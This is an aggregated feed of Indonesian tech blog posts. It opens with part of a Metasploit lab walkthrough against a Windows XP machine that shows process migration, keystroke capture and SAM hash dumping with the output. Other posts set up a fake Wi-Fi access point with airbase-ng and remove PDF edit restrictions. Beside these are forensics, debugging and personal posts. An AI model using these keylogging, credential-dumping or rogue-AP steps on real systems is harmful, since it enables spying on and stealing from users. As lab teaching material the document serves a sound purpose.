592 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
644 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
656 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
808 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
880 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
972 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1040 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1092 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1432 explorer.exe x86 0 LABTEST\Lab Test C:\WINDOWS\Explorer.EXE
1524 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
meterpreter >
msfxp05

I will run notepad.exe in windows xp, the I type “ps” command again in meterpreter to see the changes.

meterpreter > ps
Process list
============
PID Name Arch Session User Path
— —- —- ——- —- —-
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
264 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
356 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
532 wscntfy.exe x86 0 LABTEST\Lab Test C:\WINDOWS\system32\wscntfy.exe
568 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
592 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
644 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
656 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
808 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
880 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
972 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1040 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1092 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1432 explorer.exe x86 0 LABTEST\Lab Test C:\WINDOWS\Explorer.EXE
1524 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1680 notepad.exe x86 0 LABTEST\Lab Test C:\WINDOWS\system32\notepad.exe
meterpreter >
msfxp06Now, you can see that notepad is displayed in list running processes.

CAPTURING KEY STROKES
To have this ability, you have to move your remote from svchost.exe (PID 972) to your target which is notepad.exe (PID 1680).
Type command “migrate 1680” to switch the remote service and “keyscan_start” to start recording the key stokes.

meterpreter > migrate 1680
[*] Migrating from 972 to 1680…
[*] Migration completed successfully.
meterpreter >
msfxp07

meterpreter > keyscan_start
Starting the keystroke sniffer…
meterpreter >

I will type something in notepad and download the key strokes.
Type “keyscan_dump” to dump the captures keystores.
msfxp08

meterpreter > keyscan_dump
Dumping captured keystrokes…
<Ctrl> <Alt> <LCtrl> <LMenu> <Left> <Ctrl> <Alt> <LCtrl> <LMenu> this is a tre <Back> <Back> est. <Return> my user id: admin <Return> password: admin123 <Ctrl> <LCtrl> <LMenu> <Alt>
meterpreter >

As you can see above, anything that I typed with my keyboard are recorded.

GET CONTENTS OF SAM DATABASE
What is SAM?
The Security Account Manager (SAM) is a database file in Windows XP, Windows Vista and Windows 7 that stores users’ passwords. It can be used to authenticate local and remote users. SAM uses cryptographic measures to prevent forbidden users to gain access to the system.

The SAM file can not be moved or copied while windows is running. The problem is in the memory copy of the SAM can be dumped.
To get content of the target SAM database, type “hashdump”.
You can decrypt the hash using John the ripper tools after.

meterpreter > hashdump
Administrator:500:77623be0d87cb5e038f819814a7d98c8:1b0d6dfead9d84d93ebdfbc4aef3ea0b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:c39db4ac3f32182ae64aed34efa5b109:7d73a667b15ef9d5e807f87c97bb4b6d:::
Lab Test:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0d52734ebdc7ec8f61afbb4dd87db830:::meterpreter >


on 10 Jan 2016 01:39 PM

07 Jan 2016

Debian Swirl

FOSS bukanlah tentang perangkat lunak gratis saja. FOSS merupakan sebuah kultur untuk berbagi dan melakukan segala sesuatu secara gotong royong.

Bermula dari kekurangan distro SLS yang hanya dikerjakan satu orang, Ian Murdock (RIP) mengundang orang-orang untuk membuat sebuah sistem GNU/Linux baru dalam bentuk paket-paket.

Ide dasarnya adalah sebuah paket perangkat lunak mengerti bagaimana caranya mengintegrasi dirinya sendiri pada sistem; mengerti bagaimana menghapus dirinya sendiri; dan mampu memperbaharui dengan aman ke versi terbaru.

 

on 07 Jan 2016 04:11 AM

05 Jan 2016

Let’s learn Machine Learning

Putu Wiramaswara Widya

Yes, for all of you no matter what major you are on, as long as you know basic programming.

I have been learning many infrastructure thing during undergraduate time like operating system, computer network. But otherwise tends to avoid anything that very mathematical like statistics and artificial intelligence. But now, I realize that it is time for me to learn beyond my boundary that beneficial and has many possible outcome and research to do nowadays: Machine Learning. Yes, you heard that word already, it is how Autonomous Car could drive a car automatically without human interaction, it is where the Internet advertisement nowadays are show something that you are looking for, and many major application that make Internet become smart and helpful for human being. We have to realize that for no mater how complex your algorithm and programming technique you had to learn, it won’t make the program smart enough unless you give some sort of data and do some statistical based learning to it. That is where Machine Learning take place, you learn some statistics to utilize some data as bases for predicting and deciding something.

Even if you are kind a allergic with Mathematics, don’t worry, you can apply Machine Learning right away in your problem using many pre-written library and some basic fundamental concept of Machine Learning itself (personally I like to use sklearn library in Python).

So how do you should get started? As for me, I start with this very elaborate lecture from Coursera: Machine Learning with Andrew Ng. But otherwise, this is not a sole way to learn ML and you can do any other approaches such as reading from a book, attending a lecture, attending a confrence, etc.

on 05 Jan 2016 02:25 AM

04 Jan 2016

The purpose of this tutorial is for education only.
Before I start, I will explain about what is fake access point?

Access Point (AP) is a networking device that allows wireless devices to connect to a wired networking using WIFI.
Fake access point is a virtual access point that is created using an application but it acts like real access point. It is converted from our wireless device into access point. You can set a password, essid and channel on it.

What tools I need?
The tool is airbase-ng. It’s part of aircrack-ng package. So, you need to download the aircrack-ng first. Make sure you are connected to the Internet. Open your linux terminal and type:
$ sudo apt-get install aircrack-ng

What’s next?
You have to make sure that your wireless device is on. Type $ ifconfig | grep addr in your linux terminal.

darklinux@darklinux:~$ ifconfig | grep addr
eth0 Link encap:Ethernet HWaddr 00:a0:d1:79:1f:31
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
wlan0 Link encap:Ethernet HWaddr 00:1b:77:2b:a3:aa
inet addr:192.168.1.9 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fdec:cb30:766a:100:21b:77ff:fe2b:a3aa/64 Scope:Global
inet6 addr: fe80::21b:77ff:fe2b:a3aa/64 Scope:Link
inet6 addr: fdec:cb30:766a:100:44f6:1f8d:66c6:41d3/64 Scope:Global

darklinux@darklinux:~$

And the wireless card mode has to ‘monitor’. You can check using command $ ifconfig wlan0.

darklinux@darklinux:~$ ifconfig wlan0
wlan0 IEEE 802.11abg ESSID:”rumahwifi”
Mode:Managed Frequency:2.462 GHz Access Point: EC:CB:30:76:6A:08
Bit Rate=54 Mb/s Tx-Power=14 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
Link Quality=64/70 Signal level=-46 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:40 Missed beacon:0

darklinux@darklinux:~$

If the mode is not monitor, you have to change it using $ iwconfig wlan0 mode monitor.
Or just create virtual wireless card using command $ sudo airmon-ng start wlan0.

darklinux@darklinux:~$ sudo airmon-ng start wlan0
[sudo] password for darklinux:
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them!
PID Name
746 avahi-daemon
747 avahi-daemon
761 NetworkManager
807 wpa_supplicant
1109 dhclient
Process with PID 1109 (dhclient) is running on interface wlan0
Interface Chipset Driver
wlan0 Intel 3945ABG iwl3945 – [phy0]
(monitor mode enabled on mon0)
darklinux@darklinux:~$

You will have a new wireless device (mon0) is there is no error.

darklinux@darklinux:~$ iwconfig mon0
mon0 IEEE 802.11abg Mode:Monitor Tx-Power=14 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

darklinux@darklinux:~$

You can check the available wireless network using $ sudo airodump-ng -i mon0.
airbase-ng01

Start the airbase-ng using $ sudo airbase-ng -c 11 -e freewifi mon0.
-c is the channel
-e wifi name
airbase-ng02

You can open another linux teriminal and check the status. $ sudo airodump-ng -i mon0.
Now we a fake access point with essid name ‘freewifi‘.
airbase-ng03


on 04 Jan 2016 12:20 AM

Metasploit Framework (MSF) is a free open source penetration testing solution developed by open source community and rapid7. You can download Metasploit from http://www.metasploit.com. You can use Metasploit to collect the information and scanning the system vunerability.

Metasploit offers a GUI version and command line version.

After you download the metasploit installer, you can register your name. Make sure you get the metasploit license key first to activate the metasploit, otherwise you can’t run the application.

After all complete, now we can start the installation.
Copy the metasploit installer to /opt directory.
Set the file to be executeable using chmod.
$ sudo chmod +x metasploit-latest-linux-installer.run <enter>
then type $ sudo ./metasploit-latest-linux-installer.run <enter> to run the installer.
metasploit01

The opening Screen.metasploit2

Click ‘forward’ to continue. Then follow the steps below.metasploit3metasploit4metasploit5metasploit6metasploit7metasploit8metasploit9metasploit10

If there is no problem, the installation will start.metasploit11

metasploit12

Installation done.
Make sure the ‘Access Metasploit Web UI’ is selected then click ‘Finish’ button to close the installer.

metasploit13

Enter ‘metasploit license key’ to activate the metasploit.metasploit14metasploit15


on 04 Jan 2016 12:20 AM

Why we still need to learn about how to create floppy disk image?
Floppy disk is only used in the old PC but we still need it for simulation in virtual machine. May be you want to collect old applications that run in old MS-DOS, learn about how old viruses work, install first generation linux, etc.. etc so you still need this image.

I will show how to create floppy image in Linux 14.04 LTS.

Step 1. Create directory in /media
Open your linux terminal, type $cd /media. Type $sudo mkdir floppy. to create the floppy directory.

————————————————————-
darklinux@darklinux:~$ cd /media
darklinux@darklinux:/media$ ls -l
total 4
drwxr-x—+ 4 root root 4096 Jan 2 15:23 darklinux
darklinux@darklinux:/media
$ sudo mkdir floppy
[sudo] password for darklinux:
darklinux@darklinux:/media$ ls -l
total 8
drwxr-x—+ 4 root root 4096 Jan 2 15:23 darklinux
drwxr-xr-x 2 root root 4096 Jan 2 15:49 floppy
darklinux@darklinux:/media$

————————————————————-

Step 2. Create floppy disk image.
Open another linux terminal or go back to home directory.
Type $ mkfs.msdos -C myfloppy.img 1440 to create the floppy image.
-myfloppy.img is the image file
-1440 is floppy size (1.44 MB)

Type $ sudo mount -o loop myfloppy.img /media/floppy/ to mount the image with the floppy directory.

Step 3. Copy the files.
Now you can copy any file but the access has be root. For example, I want to copy oakcdrom.sys, then I type $ sudo cp oakcdrom.sys /media/floppy/
Check the result, $ ls -l /media/floppy/

Step 4. Un mount the link and remove the directory
After all done, you can umount the link. Type $ sudo umount /media/floppy.
And remove the directory, type $ sudo rm -rf /media/floppy/.

Step 5. Check the result.
Check the result with Disk Image Mounter.
Now, you are ready to use it with virtual box.

————————————————————-
darklinux@darklinux:~$ mkfs.msdos -C myfloppy.img 1440
mkfs.fat 3.0.26 (2014-03-07)
darklinux@darklinux:~
$ sudo mount -o loop myfloppy.img /media/floppy/
[sudo] password for darklinux:
darklinux@darklinux:~
$ sudo cp oakcdrom.sys /media/floppy/
darklinux@darklinux:~$ ls -l /media/floppy/
total 41
-rwxr-xr-x 1 root root 41302 Jan 2 15:57 oakcdrom.sys
darklinux@darklinux:~
$ sudo umount /media/floppy
darklinux@darklinux:~$ sudo rm -rf /media/floppy/

————————————————————-
floppy01
floppy02

floppy03


on 04 Jan 2016 12:18 AM

31 Dec 2015


Selamat Tahun baru 2016

on 31 Dec 2015 05:00 PM

29 Dec 2015

Menikmati Tantangan

Tjetjep RB

2015, di penghujung tahun… tepatnya mulai bulan Nopember 2015, tantangan demi tantangan datang dan pergi diselesaikan silih berganti… Menikmati tantangan untuk menjaga logika tetap jalan dan melatih otak untuk selalu berpikir… Tantangan pekerjaan, keluarga, personil, pertemanan datang dan pergi silih berganti tapi menikmati agar bisa mencapai tujuan… Visualisasinya seperti pada Instagram yg berjudul edisi #x […]
on 29 Dec 2015 10:29 PM

jadi...lupakan tentang menggunakan perangkat lunak yang mungkin, mungkin keliatan high tech, rumit, dan lain sebagainya.

itu yang pertama kali saya lakukan ketika mencoba untuk membuka satu berkas dengan format .pdf yang sudah diamankan dengan password baik itu untuk membuka berkas maupun memodifikasi berkas. karena saya menggunakan sistem operasi GnU/Linux, apa yang saya coba gunakan? pdftk, pdfcrack. ya...perangkat lunak yang mempunyai abilitas untuk membuka password dari berkas .pdf tersebut. 

Gambar 1. Tampilan awal ketika membuka berkas .pdf terenkripsi. dibuka menggunakan
master pdf editor 3.
Gambar 2. Identitas enkripsi pada berkas .pdf.
kalo kita melihat pada gambar 2, kita hanya diizinkan untuk mencetak saja. sedangkan kegiatan lainnya tidak diperbolehkan, alias harus membuka jalur dengan memasukkan password.

nah, sekarang, bagaimana cara membuka password yang sudah dibuat? inilah saatnya saya mungkin akan menggunakan aplikasi-aplikasi yang terlihat "canggih" tadi. tapi...setelah mencari dan berkutat dengan berbagai macam how-to yang tersebar di jagat internet, akhirnya ditemukanlah cara pamungkas yang...lebih baik :D. hahaha...dikatakan pamungkas, mungkin karena saya males ajah kali ya, musti nunggu beberapa saat (ya, tergantung. bisa 1 jam, 1 hari, atau lebih).

kalo liat dari tanggal penulisan artikel tadi, saya sudah ketinggalan 6 (enam), ya 6 tahun! beuh...ya, sebagai pembelaan, khan bukan kerjaan saya buat bongkar-bongkar berkas .pdf yang terenskripsi :D.

okeh, gapapa ya. tulisan ini memang dialamatkan sebagai pengingat terutama untuk saya pribadi. oke lanjut ya. karena saya menggunakan sistem operasi GnU/Linux Ubuntu 12.04, saya membuka berkas .pdf yang terenkripsi tadi menggunakan aplikasi baku pembuka pdf, evince.

nah...nah...tujuan dari tulisan ini adalah MEMBUKA STATUS ENKRIPSI sehingga kita bisa dengan menyunting berkas pdf yang dienkripsi tadi. saratnya memang kita harus tau password untuk membuka berkas yang dikunci tadi. pada kasus yang saya tuliskan ini, saya mengetahui password untuk membuka berkas terkunci tadi. lucky me. tapi, setelah dibuka khan kalo kita liat pada gambar 2, status keamanan pada berkas masih terkunci. kita hanya diijinkan buat nyetak tok. bagaimana kalo kita pengen menyunting berkas tersebut? itulah maksud dari tulisan saya kali ini. karena password untuk membuka berkas dengan password untuk kepentingan penyuntingan seringkali dibuat berbeda. sama seperti kasus yang saya hadapi.

lanjut ke penggunaan evince. setelah berkas kita buka menggunakan evince, langkah selanjutnya adalah dengan mencetak berkas tadi. file -> print.

Gambar 3. Opsi cetak.
pada tabel pencetak, pilih "print to file". sedangkan pada bagian "name" masukkan nama berkas yang diinginkan, lengkap dengan ekstensinya. dalam hal ini .pdf. pada "save in folder", pilih penyimpana berkas yang diinginkan. pada "output format" pilih format PDF. opsi lain-lainnya bisa diabaikan dimana langkah selanjutnya adalah klik pada tombol "print".

hasilnya adalah...berkas yang diproteksi untuk kepentingan penyuntingan, status proteksinya sebagian besar akan terbuka.

Gambar 4. Status dokumen setelah proses print to file.
bandingkan dengan gambar 2 yang statusnya sebagian besar "not allowed." dengan status seperti yang dapat dilihat pada gambar 4, saya sudah bisa menyunting berkas yang sudah dibuka tersebut :). silahkan diubah sesuai kebutuhan, dengan bijak tentunya.

semoga bermanfaat ;).

bahan bacaan:

  1. http://www.giannistsakiris.com/2009/02/24/how-to-unlock-a-secured-pdf-file/
  2. http://www.ubuntugeek.com/howto-crack-pdf-file-password.html
  3. http://www.howtogeek.com/197195/how-to-remove-a-password-from-a-pdf-file-in-linux/
gambar diambil dari:



on 29 Dec 2015 07:23 AM
Akhirnya pertanyaan dari seorang teman terjawab. Pertanyaan yang diajukan adalah bagaimana mengetahui subdomain tanpa mengetahui konfigurasi DNS Server. Aplikasi yang digunakan adalah Sublist3r. Installasi dan penggunaan Sublist3r di sistem operasi Linux Mint sebagai berikut:
1. Unduh Sublist3r, git clone https://github.com/aboul3la/Sublist3r.
2. Install pustaka Python seperti request, dns dan argaprse, sudo apt-get install python-requests python-dnspython python-argparse.
3. Masuk direktori Sublist3r
4. Menjalankan Sublist3r yang biasa saya gunakan, python sublist3r.py -v -d contoh.com.

Sublist3r menggunakan mesin pencari seperti Google, Bing, Baidu, Ask, Yahoo, Netcraft dan DNSdumpster.
on 29 Dec 2015 05:29 AM

22 Dec 2015

Asumsinya semua barang bukti elektronik memiliki memiliki media penyimpan. Maka dalam proses akuisisi saya anggap sama yaitu media penyimpan dapat diproses dengan mudah. Sebagai contoh menemukan komputer sebagai barang bukti elektronik sehingga yang diakuisisi adalah Hard Disk.

Tahapan akuisisi media penyimpan ini saya menggunakan Linux supaya praktis. selain itu Linux sudah dikenal sebagai sistem operasi secara standar sudah menerapkan prinsip-pinsip dasar forensik digital. Berikut langkah-langkah melakukan akuisisi dengan asumsi bahwa peralatan sudah lengkap :
1. Mencatat spesifikasi dan memotret dengan skala ukur media penyimpan. Spesifikasi dicantumkan dalam nama berkas.
2. Deteksi terlebih dahulu perangkat yang tertancap menggunakan perintah sudo fdisk -l. Katakan terdeteksi pada /dev/sdb.
3. Melakukan hashing terhadap media penyimpan tersebut, sudo sha1sum /dev/sdb. Catat nilai hash-nya.
4. Melakukan proses imaging menggunakan perintah sudo dc3dd if=/dev/sdb of=/data/barang-bukti/usb-merk-4GB-20151222-16.17.dd hash=sha1
5. Hasil dari langkah 4 kurang lebih seperti dibawah ini dan jangan lupa untuk dicatat:
dc3dd 7.1.614 started at 2013-12-22 16:17:37 +0700
compiled options:
command line: dc3dd if=/dev/sdb of=/data/barang-bukti/usb-merk-4GB-20151222-16.17.dd hash=sha1
device size: 7907295 sectors (probed)
sector size: 512 bytes (probed)
4048535040 bytes (3.8 G) copied (100%), 261.42 s, 15 M/s                      
input results for device `/dev/sdb':
   7907295 sectors in
   0 bad sectors replaced by zeros
072f82c54007d897383862af4907d2f774f8c319  (sha1)
output results for file `/data/barang-bukti/usb-merk-4GB-20151222-16.17.dd':
   7907295 sectors out
dc3dd completed at 2015-12-22 17:11:59 +0700
 
6. Pastikan kembali hasil hash langkah 3 dan 5 sama persis.
7. Media penyimpan tersebut kembalikan ke tempat semula, misal Hard Disk dipasang kembali ke komputer.
8. Membuat salinan terhadap berkas usb-merk-4GB-20151222-16.17.dd 2 buah dengan label master dan copy.
9. Hasil salinan berlabel copy yang selanjutnya dilakukan analisis.

Ke-9 langkah diatas ini telah saya presentasikan dalam pelatihan maupun seminar terkait dengan forensik digital. Semoga materi ini bermanfaat.
 



on 22 Dec 2015 09:38 AM

19 Dec 2015

Kerjaan pertama saya di bidang IT membawa saya traveling antar Kecamatan di Bandung (ngirim barang) :-P. Kerjaan pertama saya di Software House membawa saya traveling Antar Kota dan Antar Propinsi di Indonesia (walaupun cuma...

The post Pengalaman, Traveling dan Networking appeared first on Indra Gunawan.

on 19 Dec 2015 03:23 AM

04 Dec 2015

Debugging adalah kegiatan wajib untuk dilakukan oleh developer software manapun, namun sebagaimana yang saya amati programer sering mengesampingkan kegiatan ini dan hanya menggunakan tool-tool debugging hanya untuk memecahkan masalah yang ditemui saat programing saja (saya juga kalau dah deadline :p), jarang digunakan untuk quality assurance untuk memastikan perilaku programnya terhadap input-input yang salah (atau input yg sengaja salah dalam konteks keamanan). Kenapa bisa begitu? Meme ini dibawah bisa ngasih gambaran :D

80ff000de170d180836519b11ef29b7814dc5d5b5b24abed94f5c3828075e811

Generasi saya dahulu debugging sudah menjadi pekerjaan yang mudah karena dibantu oleh interface Borland C yang begitu intuitif dan informatif, dan kebiasaan debugging dengan tool built-in sudah seakan menjadi menu wajib untuk sebuah lingkungan pengembangan perangkat lunak yang baik. Tapi ketika beralih ke Gnu C Compiler dan mulai belajar pemrograman untuk linux interface tadi hilang dan dihadapkan dengan compiler murni yang hanya menginfokan error yang terjadi dan dibaris mana letak salahnya.. mengerikan! Bagi yang sudah biasa dengan GUI pasti mikir 1000kali untuk belajar c dengan gcc!

Oh well, memang saatnya belajar debuging secara old-skool pikir saya.. dan ternyata memang banyak manfaatnya mempelajari debugging secara manual dengan GDB, kita jadi bisa lebih mengerti alur bagaimana sebuah komputer berkerja, karena kita memberikan atensi terhadap detil dalam aplikasi kita dan mungkin kedepannya kita bisa membuat sebuah hack yang menyederhanakan alur logika aplikasi kita sehingga aplikasi nantinya lebih kodenya lebih simple dan elegan serta performanya juga cepat.

Kemampuan debugging ini juga sering dijadikan senjata bagi para peretas untuk mendeteksi sebuah vulnerabilitas dari sebuah aplikasi seperti buffer over flow (BOF) dan dieksploitasi untuk menjalankan kode-kode yang disisipi, bahkan menurut saya kemampuan ini (selain kemampuan programing) termasuk skill utama yang menjadi pembeda antara seorang script kiddies dan hacker sejati.archer

GDB atau The Gnu Debugger sebenarnya adalah tool debugin yang tidak spesifik untuk bahasa C saja, namun juga mendukung bahasa-bahasa lainnya seperti C++, Python, Ada, Objective C, dlsb. Menurut situs resminya GDB secara garis besar mempunyai 4 kemampuan yaitu :

  • Menjalankan program dengan menspesifikasikan apapun yang mungkin dapat mempengaruhi perilaku aplikasi tsb
  • Membuat program berhenti sementara  pada kondisi yang telah ditentukan (biasanya menggunakan istilah break)
  • Memeriksa apa yang telah terjadi ketika aplikasi tersebut dihentikan sementara (kondisi/isi tiap variabel)
  • Merubah hal yang ada didalam aplikasi sehingga kita bisa bereksperimen dengan dampak dari perbaikan sebuah bug, dan apakah ada dampak lanjutan dari perubahan tersebut.

4 langkah diatas sebenarnya gak jauh beda dengan yang pakai GUI, cuman kalau pakai GUI enaknya tinggal klik pada baris tempat break.. kemudian run.. terus tinggal klik step setiap ingin lihat perubahan variabel, sedang kalau pakai GDB bisa stress kalau gak biasa lihat tulisan.. kaya penggemar komik disuruh baca novel :p

Tulisan ini pengantar dari rencana saya membuat tutorial mengenai dasar-dasar debuging menggunakan GDB ini akan dibagi menjadi beberapa part mengikuti garis besar diatas, dan kalau gak malas 2 hari lagi muncul part 1 nya :p


on 04 Dec 2015 08:33 AM

01 Dec 2015

Sekedar "refreshing" forensik RAM menggunakan Volatility di Linux. Kebetulan saya menggunakan Linux Mint yang masih turunan Ubuntu jadi cukup ketik sudo apt-get install volatility-tools untuk install Volatility.

Selesai install saatnya dimainkan Volatility. Ketika menjalankan perintah-perintah Volatility selalu muncul galat NameError: name 'distorm3' is not defined. Awalnya saya abaikan karena kebutuhannya sudah terpenuhi. Tapi lama-lama mengganggu juga galat tersebut.

Supaya galat tersebut hilang ada beberapa hal yang dilakukan, diantaranya:
2. Ekstrak distorm3-3.3.0.zip
3. Masuk ke direktori distorm3-3.3.0, jalankan perintah sudo python setup.py build install

Cukup 3 langkah tersebut galat NameError: name 'distorm3' is not defined sudah tidak muncul. Selamat menguji coba forensik RAM.
on 01 Dec 2015 05:12 AM

26 Nov 2015

Candra Senja

Ups..sorry..
Under maintenance...
on 26 Nov 2015 05:58 PM

25 Nov 2015

Akhir pekan lalu saya berkesempatan mengikuti MelbDjango camp. Saat malam semakin larut, saya melihat teman-teman yang lain. Mengapa layar komputer mereka berwarna menguning lalu semakin lama semakin merah?

“What’s wrong with your monitor?”, tanya saya. Kebanyakan mereka menggunakan MacBook. Lalu saya diberi tahu soal aplikasi f.lux. Saya belum sempat melihat detail penelitian f.lux, pendek cerita saya cari aplikasi serupa untuk GNU/Linux. Karena saya ingin segera mencoba, apakah benar memang lebih nyaman bagi mata?

Hingga akhirnya saya temukan aplikasi redshift. Saya install, dan saya coba. Hmm… memang mata jadi lebih sejuk.

Dan berikut respon teman saya saat saya bilang bahwa saya baru mengetahui soal redshift.

@za it’s pretty jarring when you start up redshift at this time of day :stuck_out_tongue:

You need to ease into it to ease into that bring red mode

on 25 Nov 2015 07:54 AM

23 Nov 2015

Jika suatu saat menemui kejadian dimana kita lupa password Admin Server pada Weblogic, cara yang bisa diambil adalah me-reset atau merecover password tersebut, lokasi password biasanya disimpan di berkas boot.properties. Ini adalah cara merecover, bukan mereset password tersebut. Ambil terlebih dahulu password yang terenkripsi pada berkas boot.properties. Masuk ke folder security Buat berkas script yang berfungsi untuk […]
on 23 Nov 2015 04:04 AM

17 Nov 2015

Hari ini salah satu server AIX mendadak tidak bisa diakses oleh salah satu user (user01), error yang muncul di putty adalah Saya coba login menggunakan user root kemudian jalankan su – user01 muncul error “cannot fork: too many processes” Dari situ diketahui bahwa ini adalah masalah pada “user process” yang sudah melebihi dari settingan maksimal. […]
on 17 Nov 2015 04:06 AM

13 Nov 2015

Ini adalah error yang ditemui saat mau melakukan instalasi software “Installation Manager” yang akan digunakan untuk melakukan instalasi Websphere 8.5 di AIX, “Installation Manager” melaporkan bahwa beberapa library gtk belum terinstall. Berikut adalah langkah instalasi “Installation Manager” Solusinya adalah: Download paket gtk+ yang dibutuhkan kemudian install paket tersebut, paket gtk+ yang dibutuhkan untuk instalasi ini […]
on 13 Nov 2015 03:46 AM

12 Nov 2015

Demonstrates the use of the hardening cookbooks via Chef to increase the security of your server. — PREREQUISITES a. Install berkshelf b. Install knife-solo — HARDENING 1. Download this kitchen 2. Download cookbooks 3. Update your ssh key in ‘data_bags/users/root.json’ 4. Bootraps a fresh server with the cookbooks Source : http://lollyrock.com/articles/how-to-harden-a-new-server/
on 12 Nov 2015 11:04 AM

01 Nov 2015

Perhatian: artikel ini bukan membandingkan gear mana yang lebih baik, tetapi lebih kearah sharing pola pikir kenapa sampai akhirnya saya memutuskan melepas sistem DSLR saya ke MFT. Well, mungkin sebagian orang bakal merasa aneh kalo...

The post Migrasi ke Micro Four Thirds appeared first on Indra Gunawan.

on 01 Nov 2015 03:32 AM

13 Oct 2015

Ini bulan Oktober, sudah jelas hari lahir saya di bulan ini. Cuma yang saya kurang jelas, atau lebih tepatnya lupa, bertepatan dengan ulang tahun, masa berlaku SIM saya pun habis. Sudah lewat beberapa hari. Saya panik, karena dulu-dulu saya harus balik ke kampung halaman cuma demi perpanjang SIM saja (SIM saya bukan terbitan Jakarta). Selain menghabiskan waktu, biaya apa lagi. Apalagi ini udah keburu habis masa berlakunya.

Lalu saya teringat bulan lalu ramai berita perpanjang SIM sekarang bisa online. Jadi walaupun SIM saya misal dari Medan, saya bisa perpanjang di Jakarta. Selain itu, katanya SIM yang sudah habis masa berlakunya, masih bisa diperpanjang sampai 3 bulan ke depan. Saya googling, kata berita sih begitu. Cuma biasanya kan berita dengan praktik di lapangan bisa beda jauh. Apalagi urusan sama aparat.

Gerai Samsat/SIM Mall Gandaria City

Jadi berangkatlah saya pagi tadi ke Gerai Samsat yang terletak di dalam Mall Gandaria City. Baca di blog ini, katanya harus persiapan bawa fotokopi KTP dan SIM. Saya nyari-nyari tempat fotokopi di luar Mall Gandaria City (Gancit), ternyata gak nemu. Kata satpam ada di Paperclip dan Bis Express (tauk dah ini bener gak nulisnya). Dan ternyata kedua tempat itu masih tutup. Saya datang pukul 9.30 sih.

Ya sudah, saya langsung ke lokasi gerai Samsat saja. Berharap ada mesin fotokopi di sana. Sampai di sana, agak khawatir karena antriannya ramai juga. Seperti di foto ini:

Dan saya akhirnya menemukan kejelasan berikut:
1.    Benar, SIM yang sudah habis masa berlakunya, bisa diperpanjang sampai maksimum 3 bulan setelah masa berlaku habis. Kalau sudah lewat 3 bulan harus bikin baru.
2.    Mesin fotokopi disediakan. Bayar sih, tapi 3 ribu perak doang.
3.    Bener kata blog yang saya baca itu, pulpen di meja tempat isi form gak ada. Ilang semua. Untung saya udah bawa sendiri.
4.    KTP nya harus sudah menggunakan NIK yang dari e-KTP (kayaknya khusus yang online sih).

Proses Perpanjangan SIM

Saya masuk ke dalam gerai.

MDD: Mbak Di Depan (tauk deh dia Polwan atau staf admin). S: Saya.

S: Mbak, kalau mau perpanjang SIM gimana ya? Saya mau perpanjang sekaligus nih SIM A dan C.
MDD: Coba lihat SIM dan KTP nya ya, Mas.
S: (saya kasih)
MDD: Oh.. Jambi ya?
S: (mulai panik) Sudah online kan sekarang Mbak?
MDD: Sudah sih.. Tapi Jambi bisa gak ya..? (Terus ngubek-ngubek tasnya. Saya bingung, nih polwan kok malah nyari lipstik sih..)
S: (mulai pesimis)
MDD: *** (memanggil nama seseorang, saya gak inget siapa). Eh, kalau perpanjang Online dari Jambi bisa gak? (terus hening, Pak Polisi dan staff lain yang di situ cuma ngelirik, terus gak jawab)
S: (makin pesimis. Siap-siap deh pesen tiket pesawat lagi..)
MDD: Nahh… (akhirnya selesai ngubek-ngubek tasnya. Terus dia ngeluarin lipstik selembar pamflet). Perpanjangan SIM emang sudah online, Mas. Tapi ada list nya kota-kota mana aja yang bisa online. (Terus dia baca satu-satu daftarnya).
S: (tegang. Seperti di Indonesian Idol sewaktu VJ Daniel bilang “Daaan.. Indonesia memilihh…”)
MDD: Polresta Jambi? Ohh ada nih. Bisa sih harusnya.
S: (langsung mau sujud syukur. Tapi karena sempit dan ramai, gak jadi. Dalam hati aja). Sippp. Terus gimana Mbak?
